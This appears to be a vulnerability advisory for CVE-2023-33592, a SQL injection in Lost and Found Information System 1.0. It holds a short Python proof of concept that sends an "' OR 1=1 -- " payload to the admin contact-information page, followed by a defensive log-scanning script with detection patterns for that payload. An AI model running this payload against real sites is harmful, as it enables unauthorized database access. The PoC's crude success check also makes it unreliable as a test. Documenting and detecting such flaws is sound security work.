Headline
Lost And Found Information System 1.0 SQL Injection
Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592

import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")
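
A defender-side check for the request pattern in the PoC above, as an added example that is not part of the original advisory or the application's code: it scans web access-log lines for `page` values under `/php-lfis/admin/` that carry SQL metacharacters. The combined log format, the character allowlist for `page`, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Component path taken from the advisory.
ADMIN_PATH = "/php-lfis/admin/"
# Assumption: legitimate `page` values are path-like names such as
# "system_info/contact_information" (letters, digits, "_" and "/").
SAFE_PAGE = re.compile(r"[A-Za-z0-9_/]+")
# Tokens of the tautology/comment style payload used in the PoC.
SQLI_HINT = re.compile(r"'|--|\bor\b\s+\d+\s*=\s*\d+|\bunion\b", re.I)
# Request field of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [30/Jun/2023:10:00:01 +0000] "GET /php-lfis/admin/?page=system_info/contact_information HTTP/1.1" 200 5120
203.0.113.9 - - [30/Jun/2023:10:00:05 +0000] "GET /php-lfis/admin/?page=system_info/contact_information%27%20OR%201=1%20--%20 HTTP/1.1" 200 5340
203.0.113.9 - - [30/Jun/2023:10:00:09 +0000] "GET /php-lfis/admin/?page=system_info/contact_information'+OR+1=1+--+ HTTP/1.1" 200 5340
198.51.100.4 - - [30/Jun/2023:10:01:00 +0000] "GET /php-lfis/admin/?page=user/list.php HTTP/1.1" 404 312
198.51.100.4 - - [30/Jun/2023:10:01:03 +0000] "GET /index.php?q=it%27s HTTP/1.1" 200 900
""".splitlines()


def suspicious_page_values(log_lines):
    """Return (line_no, decoded page value, reason) for each flagged request."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        target = urlsplit(m.group(1))
        if not target.path.startswith(ADMIN_PATH):
            continue
        # parse_qsl percent-decodes, so %27 and "+" are normalised before matching.
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key != "page":
                continue
            if SQLI_HINT.search(value):
                hits.append((no, value, "sql-metacharacters"))
            elif not SAFE_PAGE.fullmatch(value):
                hits.append((no, value, "unexpected-characters"))
    return hits


if __name__ == "__main__":
    for hit in suspicious_page_values(SAMPLE_LOG):
        print(hit)
```

Matching on the decoded value catches both the `%27%20` and the `'+` encodings of the same payload, while the unrelated `/index.php` request with an apostrophe is ignored because it is outside the affected path.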
Related news
CVE-2023-33592: CVE/CVE-2023-33592 at main · DARSHANAGUPTA10/CVE
Lost and Found Information System v1.0 was discovered to contain a SQL injection vulnerability via the component /php-lfis/admin/?page=system_info/contact_information.